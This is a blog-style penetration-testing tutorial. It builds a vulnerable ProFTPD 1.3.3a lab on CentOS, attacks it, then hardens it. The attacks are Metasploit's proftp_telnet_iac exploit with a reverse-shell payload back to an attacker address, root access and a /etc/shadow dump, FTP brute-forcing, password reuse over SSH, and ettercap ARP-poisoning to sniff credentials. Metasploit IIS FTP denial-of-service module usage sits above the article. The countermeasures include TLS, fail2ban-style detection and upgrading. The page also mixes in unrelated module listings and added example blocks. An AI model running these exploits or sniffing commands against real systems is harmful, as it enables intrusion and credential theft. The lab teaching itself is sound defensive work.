Microsoft IIS FTP Server LIST Stack Exhaustion

This module triggers a denial of service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need: 1) a valid FTP account, either read-only or with write access; 2) the 'FTP Publishing' service configured with the 'manual' startup type; 3) at least one directory under the FTP root directory. If the supplied FTP account has write access and no directory exists, a directory with a random name is created before the exploit payload is sent.
Module Name: auxiliary/dos/windows/ftp/iis_list_exhaustion
Authors: Kingcope, Myo Soe

Module Options: To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

    msf > use auxiliary/dos/windows/ftp/iis_list_exhaustion
    msf auxiliary(iis_list_exhaustion) > show actions
        ...actions...
    msf auxiliary(iis_list_exhaustion) > set ACTION <action-name>
    msf auxiliary(iis_list_exhaustion) > show options
        ...show and set options...
    msf auxiliary(iis_list_exhaustion) > run

Module Name: auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof
Authors: Matthew Bergin, jduck

Module Options: To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

    msf > use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof
    msf auxiliary(iis75_ftpd_iac_bof) > show actions
        ...actions...
    msf auxiliary(iis75_ftpd_iac_bof) > set ACTION <action-name>
    msf auxiliary(iis75_ftpd_iac_bof) > show options
        ...show and set options...
    msf auxiliary(iis75_ftpd_iac_bof) > run
In this article we are going to learn how to configure the ProFTPD service on a CentOS machine. After that we will conduct penetration testing to evaluate the security of the FTP service, and then we will learn the countermeasures for the vulnerabilities found.

Installation and Configuration of FTP Service on a CentOS Linux Machine

1. The source code of an older version of the ProFTPD server (1.3.3a) was downloaded from the ProFTPD source code repository.
The commands used were (the hash sign is the root shell prompt and is not typed) (ProFTPD, 2011):

    # cd /usr/local/src
    # wget -c ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2

(The later steps assume the archive has been extracted into /usr/local/src/proftpd-1.3.3a.)

2. For compilation of the source code, development libraries and compilers need to be installed on the CentOS machine. They were installed using the following command (ProFTPD, 2013):

    # yum -y groupinstall 'Development tools'

3. The ProFTPD server runs as a non-privileged user on the Linux system for security reasons. A group called ftpd was created, and then a user called ftpd that belongs to the ftpd group. The following commands were used:

    # groupadd ftpd
    # useradd -g ftpd ftpd

    groupadd ftpd          Creates a new group called ftpd and populates the /etc/group file.
    useradd -g ftpd ftpd   Creates a new user called ftpd that has ftpd as its primary group (specified by the -g parameter) and populates the /etc/passwd file.

4. Once the user and group ftpd were added, the next step was to compile the source code of the ProFTPD server to produce the proftpd binary, which implements the FTP (File Transfer Protocol) service.
The following commands were used to achieve this (ProFTPD, 2011):

    # install_user=ftpd install_group=ftpd ./configure --prefix=/usr --sysconfdir=/etc
    # make
    # make install

./configure: This command runs a shell script called configure in the current directory. The script checks the build dependencies and the machine architecture on which the software is going to be compiled. Its main task is to generate a file called Makefile, which contains the compilation and installation instructions read by the make command. The install_user and install_group variables tell the configure script that the user and group used by ProFTPD are ftpd and ftpd, respectively. The --prefix=/usr option instructs it to install the binaries under /usr rather than the default /usr/local. Finally, --sysconfdir=/etc instructs it to install the configuration files in the /etc directory.

make: This command compiles the binary as per the instructions in the Makefile.

make install: This command installs the compiled binaries, which include the ProFTPD daemon, proftpd.
5. Once the binaries were compiled, the location of proftpd was found using the following command:

    # which proftpd

The version was also checked:

    # /usr/sbin/proftpd -v

6. The main configuration file of the ProFTPD server, proftpd.conf, located in /etc, was edited with the vi editor. The final configuration file is heavily commented (comments start with a # sign) for explanation. In the same file, the anonymous section (opened with <Anonymous ~ftp> and closed with </Anonymous>) had all of its directives commented out, by putting a hash sign in front of each line, to disable anonymous FTP service on the ProFTPD server. The final configuration only allows local Linux accounts (users defined in /etc/passwd) and chroots them to their home directory so that they cannot break out of it.

7. Since the ProFTPD daemon is configured to support local Linux accounts and to chroot each user to his or her home directory, a new user called prithak was added to the Linux system for testing. The following commands were used:

    # useradd prithak
    # passwd prithak
    (enter the password twice)

Similarly, another user called daniel was added to the system.
Finally, we now have the following users on the system:

    Username   Password
    prithak    1234qwer
    daniel     1a2b3c
    chintan    a1b2c3d4

8. The ProFTPD server (192.168.79.135) was started in debugging mode and was accessed from the Windows machine (192.168.79.1) using the built-in Windows ftp command. The user prithak (with password prithak) was able to log into the ProFTPD server successfully, and at the same time the server produced debugging logs on standard output confirming the details of the login. proftpd was started with the following command line options:

    # proftpd -n -d 4 -c /etc/proftpd.conf --ipv4

The options are as follows:

    -n                     Runs the proftpd process in standalone mode (it must be configured as such in the configuration file), but does not background the process or disassociate it from the controlling tty. Additionally, all output (log or debug messages) is sent to stderr rather than to syslog.
    -d 4                   Runs the ProFTPD server in debugging mode; the parameter 4 sets the logging verbosity level to 4.
    -c /etc/proftpd.conf   Instructs the ProFTPD daemon to read the configuration file located at /etc/proftpd.conf.
    --ipv4                 Instructs the ProFTPD daemon to listen only on IPv4 addresses, i.e., IPv6 is disabled (if present).

9. To ensure that the ProFTPD server running on 192.168.79.135 starts every time Linux is restarted, the initialization script (init script) that comes with the ProFTPD source was copied to the CentOS System V init script directory (/etc/rc.d/init.d). Then the script was made executable. Finally, the ProFTPD service was turned on using the chkconfig command.
    # cp /usr/local/src/proftpd-1.3.3a/contrib/dist/rpm/proftpd.init.d /etc/rc.d/init.d/proftpd
    # chmod 775 /etc/rc.d/init.d/proftpd
    # chkconfig proftpd on

Reconnaissance, Footprinting, and Exploitation

1. Reconnaissance and Footprinting

The first step in every vulnerability assessment is to find out what services are running and their versions; this is called reconnaissance and footprinting. To complete this step, a port scan against the target machine is launched. Following the same principle, the nmap port scanner was launched against the machine with the following parameters:

    root@bt:~# nmap -sS -PN -n -sV -sC 192.168.79.135

The Nmap scan result indicated that the remote machine has two open ports: 22 (SSH) and 21 (FTP). The version of the FTP server running on the remote machine is ProFTPD 1.3.3a and that of SSH is OpenSSH 5.3. Also, the SSH server only supports SSH protocol version 2.0.
2. Buffer Overflow Attack Against the ProFTPD Service

When known vulnerabilities for ProFTPD 1.3.3a were searched for on the Internet, the following results were obtained: the vulnerability CVE-2010-4221 was identified as affecting the version of ProFTPD (1.3.3a) that we were running. The exploit was launched from Metasploit with the following commands:

    Metasploit Command                         Description
    use exploit/linux/ftp/proftp_telnet_iac    Loads the proftp_telnet_iac exploit into the current context.
    set RHOST 192.168.79.135                   The target host of the exploit, i.e., the IP address of the vulnerable machine.
    set PAYLOAD linux/x86/shell_reverse_tcp    The shellcode that will be executed after successful exploitation. Here the reverse shell payload is chosen: it connects back to the attacker after the exploit succeeds. The IP address it connects back to is set by the LHOST parameter.
    set LHOST 192.168.79.144                   The IP address of the attacker.
    exploit -j                                 Launches the exploit as a background job.
As a result of successful exploitation, a reverse shell was obtained on the 192.168.79.135 (ProFTPD) server. A new session was created for the shell, which could be listed using the "sessions -l" command in the Metasploit console.
To interact with the session, the "sessions -i 1" command was used. To check the privilege level of the user who has triggered the reverse shell, the following commands were used:

    id       This command prints the effective user id of the user. The output showed that we had uid 0 and gid 0, i.e., we were the root user.
    whoami   This command prints the user-friendly name of the current user. Its output also confirmed that we had root access on the machine.

Since we had the privileges of the superuser (root), we were also able to dump the /etc/shadow file, which contains the password hashes of the users on the system and is only readable and writeable by the root user.
The following screenshot shows the interaction.

2. Brute-Force and Password Reuse Attack Against the ProFTPD Server

To carry out a password brute-force attack against the ProFTPD server, the following Python script was written. The script tries to brute-force the passwords of the users prithak, chintan, and daniel, using the default password file that comes with BackTrack as the password database. Using this script, the passwords of the FTP users prithak, chintan, and daniel were brute-forced and obtained successfully. The following screenshot shows the passwords obtained. Since most systems use the same username and password for multiple services, the usernames and passwords obtained from the previous attacks were tried against the SSH server running on the same machine. This attack is also called the "password reuse attack" (Harper, 2011).
The password reuse attack was successful and the above credentials were also valid for SSH login. The following screenshot shows the successful SSH login.

3. ARP Poisoning and Password Sniffing Attack

Since the FTP protocol sends usernames and passwords in clear text, it is susceptible to password sniffing attacks. The following machines are involved in this attack:

    192.168.79.135   ProFTPD Server (FTP server)
    192.168.79.144   BackTrack (attacker)
    192.168.79.150   Windows XP (FTP client)

The following screenshot shows the address resolution protocol (ARP) table on the Windows XP host before the ARP poisoning attack is launched. It can be seen that all the hosts have different MAC addresses associated with them. Since the attacker is on the same LAN segment as the FTP server and the FTP client, it is possible for the attacker to launch an ARP poisoning attack so that he can sit in the middle of the FTP exchange and sniff the password. To do this, the following steps were performed on the attacker's machine. The ettercap utility was used to launch an ARP poisoning attack against both 192.168.79.150 (the Windows XP FTP client) and 192.168.79.135 (the ProFTPD server). The following command was used:

    # ettercap --iface eth4 --text --quiet --mitm arp /192.168.79.150/ /192.168.79.135/

The following screenshot shows the ARP table on the Windows XP machine before and after the attack was launched. Now, when the client logs into the FTP server, the ettercap utility grabs the password and prints it.
Countermeasures

1. Countermeasure Against the Buffer Overflow Exploit

Since an older version of ProFTPD is being run on the system, the most effective countermeasure is to install the latest version of the same software. Another countermeasure is to install a different FTP server with a very good security track record; the Pure-FTPd server seems to have a better security track record than ProFTPD. To apply the countermeasure, we chose to upgrade to the latest version of the same software.
This was done by following similar steps to those used to install the older version of ProFTPD. The steps used were as follows. The running ProFTPD server was stopped with the following command:

    # service proftpd stop

The older version of ProFTPD was removed by entering its source directory and running "make deinstall":

    # cd /usr/local/src/proftpd-1.3.3a
    # make deinstall

The latest version of ProFTPD was installed in the same way and started, and then the lsof command was used to verify that the FTP server was running. It was also possible to log into the FTP server using the same usernames and passwords as before. This proved that the upgraded FTP service was indeed working. When the same exploit that was used previously was launched against the upgraded ProFTPD server using Metasploit, it failed. This verified that the service was patched. Also, at the time of writing, no known exploits (local or remote) exist for ProFTPD version 1.3.5-rc2, the version we are now running.
2. Countermeasure Against Password Sniffing and Password Reuse Attacks

The FTP protocol can be secured by using FTP over SSL/TLS (FTPS). The following steps can be performed to enable FTPS:
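The directives below are an added example, not the article's own proftpd.conf (which this page does not reproduce): they combine the local-accounts-only, chrooted setup from step 6 with mandatory TLS via mod_tls for the FTPS countermeasure. The fragment assumes ProFTPD was compiled with --with-modules=mod_tls and that a self-signed certificate and key exist at the paths shown; the paths, ServerName, log file and limits are assumptions rather than values from the article.

```apacheconf
# Hardened proftpd.conf fragment (added example, not the article's file).
# Assumes ./configure ... --with-modules=mod_tls and a self-signed
# certificate created beforehand, for example with:
#   openssl req -x509 -newkey rsa:2048 -nodes -days 365 \
#     -keyout /etc/pki/tls/private/proftpd.key -out /etc/pki/tls/certs/proftpd.crt
ServerName            "ProFTPD Server"
ServerType            standalone
DefaultServer         on
Port                  21
UseIPv6               off
# Run as the unprivileged account created in step 3
User                  ftpd
Group                 ftpd
Umask                 022

# Only local accounts from /etc/passwd; each user is jailed in its home directory
DefaultRoot           ~
# The FTP users get /bin/false as their shell (countermeasure 2). Turning this
# off accepts them without listing /bin/false in /etc/shells; the article's
# alternative is to keep the default (on) and add /bin/false to /etc/shells.
RequireValidShell     off
MaxLoginAttempts      3
TimeoutLogin          60
TimeoutNoTransfer     300
MaxClientsPerHost     3

# No <Anonymous> section at all, so anonymous FTP stays disabled

<IfModule mod_tls.c>
  TLSEngine                  on
  TLSLog                     /var/log/proftpd/tls.log
  TLSProtocol                TLSv1.2
  TLSRSACertificateFile      /etc/pki/tls/certs/proftpd.crt
  TLSRSACertificateKeyFile   /etc/pki/tls/private/proftpd.key
  # Refuse any session (control and data channel) that does not negotiate
  # TLS, so usernames and passwords are never sent in clear text
  TLSRequired                on
  TLSVerifyClient            off
  TLSOptions                 NoSessionReuseRequired
</IfModule>
```

A self-signed certificate is why the FileZilla client described next warns on first connection; the warning disappears once the certificate is accepted, and replacing it with one issued by a CA the clients trust removes it entirely.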
To test the login, the FileZilla FTP client was installed, and it was able to log in to the ProFTPD server successfully using SSL/TLS. However, a warning message related to the certificate was shown, because the certificate is self-signed. Once the certificate was accepted, subsequent logins produced no errors.
Also, the passwords used for the FTP server should be secure and strong. The FTP users should have their shell changed to /bin/false, which ensures that they cannot log in over SSH, telnet, or TTY sessions (ProFTPD still accepts them as long as /bin/false is listed in /etc/shells, since it requires a valid shell by default). This was done using the following commands:

    # chsh -s /bin/false prithak
    # chsh -s /bin/false daniel
    # chsh -s /bin/false chintan
    # echo /bin/false >> /etc/shells

3. Countermeasure Against Password Brute-Force Attacks

To defend against password brute-force attacks, the following steps were taken:

When an FTP password brute-force attack is carried out from IP address 192.168.79.222 (BackTrack) against the ProFTPD server (192.168.79.135), the attack is detected and the attacker's IP address is blocked. The iptables rule blocking 192.168.79.222 that was inserted by fail2ban is highlighted below.

CONCLUSION

The ProFTPD server was installed from source and attacked using a buffer overflow exploit, password sniffing, and password brute-force attacks.
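The detection step of countermeasure 3, as an added example that is not the article's own fail2ban setup: a small Python script that applies fail2ban's maxretry/findtime rule to ProFTPD failed-login lines and reports the source address to block. The log lines are constructed to follow ProFTPD's syslog format (hostname, PIDs and timestamps are made up), and the iptables rule is a simplified equivalent of the one fail2ban inserts.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed /var/log/secure excerpt in the shape ProFTPD 1.3.x logs failed logins
# (192.168.79.222 is the article's brute-forcing box, 192.168.79.135 the server).
SAMPLE_LOG = """\
Jun 12 10:15:01 ftp proftpd[2345] 192.168.79.135 (192.168.79.222[192.168.79.222]): USER prithak (Login failed): Incorrect password.
Jun 12 10:15:02 ftp proftpd[2346] 192.168.79.135 (192.168.79.222[192.168.79.222]): USER prithak (Login failed): Incorrect password.
Jun 12 10:15:02 ftp proftpd[2347] 192.168.79.135 (192.168.79.222[192.168.79.222]): USER bob: no such user found from 192.168.79.222 [192.168.79.222] to 192.168.79.135:21
Jun 12 10:15:03 ftp proftpd[2348] 192.168.79.135 (192.168.79.222[192.168.79.222]): USER daniel (Login failed): Incorrect password.
Jun 12 10:15:03 ftp proftpd[2349] 192.168.79.135 (192.168.79.222[192.168.79.222]): USER chintan (Login failed): Incorrect password.
Jun 12 10:16:10 ftp proftpd[2351] 192.168.79.135 (192.168.79.150[192.168.79.150]): USER prithak (Login failed): Incorrect password.
Jun 12 10:16:20 ftp proftpd[2352] 192.168.79.135 (192.168.79.150[192.168.79.150]): USER prithak: Login successful.
Jun 12 10:40:00 ftp proftpd[2353] 192.168.79.135 (192.168.79.150[192.168.79.150]): USER daniel (Login failed): Incorrect password.
"""

# The two failure messages fail2ban's proftpd filter also keys on:
# a wrong password for an existing user, and an unknown user name.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\] \S+ "
    r"\(\S+\[(?P<ip>[0-9.]+)\]\): USER (?P<user>[^\s:]+)"
    r"(?: \(Login failed\): .*|: no such user found .*)$"
)

def failed_logins(log_text):
    """Yield (timestamp, source_ip, user) for every failed-login line."""
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            # syslog timestamps carry no year; strptime defaults it to 1900
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            yield ts, m.group("ip"), m.group("user")

def ips_to_ban(log_text, maxretry=5, findtime=timedelta(seconds=600)):
    """fail2ban's rule: ban a source once it has >= maxretry failures
    inside a sliding window of findtime. Returns {ip: time_of_ban}."""
    window = defaultdict(deque)
    banned = {}
    for ts, ip, _user in failed_logins(log_text):
        if ip in banned:
            continue
        hits = window[ip]
        hits.append(ts)
        while ts - hits[0] > findtime:  # drop failures older than findtime
            hits.popleft()
        if len(hits) >= maxretry:
            banned[ip] = ts
    return banned

def iptables_rules(banned):
    """Simplified equivalent of the DROP rules fail2ban inserts (fail2ban
    itself uses a per-jail chain rather than INPUT directly)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(banned)]
```

Running ips_to_ban over the sample bans only 192.168.79.222 (five failures within three seconds); the two failures from 192.168.79.150 are 24 minutes apart, outside findtime, so that host is left alone.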
Also, the service was secured using compulsory SSL/TLS certificates and the Fail2ban intrusion detection system, and by upgrading the service to the latest version.

References:
http://www.proftpd.org/docs/howto/Compiling.html

Warlock works as an Information Security Professional. He has quite a few global certifications to his name, such as CEH, CHFI, OSCP and ISO 27001 Lead Implementer. He has experience in penetration testing, social engineering, password cracking and malware obfuscation. He is also involved with various organizations to help them strengthen the security of their applications and infrastructure.
3 responses to "Penetration Testing of an FTP Service"

Anonymous:
The "ftp/anonymous" scanner will scan a range of IP addresses searching for FTP servers that allow anonymous access and determines where read or write permissions are allowed.

    msf > use auxiliary/scanner/ftp/anonymous
    msf auxiliary(anonymous) > show options

    Module options:

       Name     Current Setting      Required  Description
       ----     ---------------      --------  -----------
       FTPPASS  mozilla@example.com  no        The password for the specified username
       FTPUSER  anonymous            no        The username to authenticate as
       RHOSTS                        yes       The target address range or CIDR identifier
       RPORT    21                   yes       The target port
       THREADS  1                    yes       The number of concurrent threads

Configuring the module is a simple matter of setting the IP range we wish to scan along with the number of concurrent threads and letting it run.